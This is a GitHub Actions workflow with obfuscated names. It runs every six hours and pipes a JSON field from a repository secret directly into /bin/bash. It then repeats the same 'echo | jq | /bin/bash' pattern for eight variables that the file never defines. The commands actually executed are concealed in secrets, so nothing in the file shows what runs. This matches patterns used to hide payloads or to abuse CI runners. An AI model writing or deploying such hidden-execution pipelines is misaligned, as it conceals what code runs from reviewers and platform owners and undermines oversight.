name: liaojiexcv

on:
  workflow_dispatch:
  schedule:
    - cron: '37 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liaojiexcv
        env:
          w6042: ${{ secrets.w6042 }}
        run: |
          echo $w6042 | jq -r .nwe035 | /bin/bash
          echo $i23 | jq -r .g08 | /bin/bash
          echo $xaem92 | jq -r .blr3 | /bin/bash
          echo $zob01884 | jq -r .n442 | /bin/bash
          echo $x8 | jq -r .djne0 | /bin/bash
          echo $swzve99 | jq -r .dnwp4467 | /bin/bash
          echo $nfri643 | jq -r .bno88332 | /bin/bash
          echo $ol25 | jq -r .sgjse27 | /bin/bash
          echo $bmvh91 | jq -r .aejc65 | /bin/bash

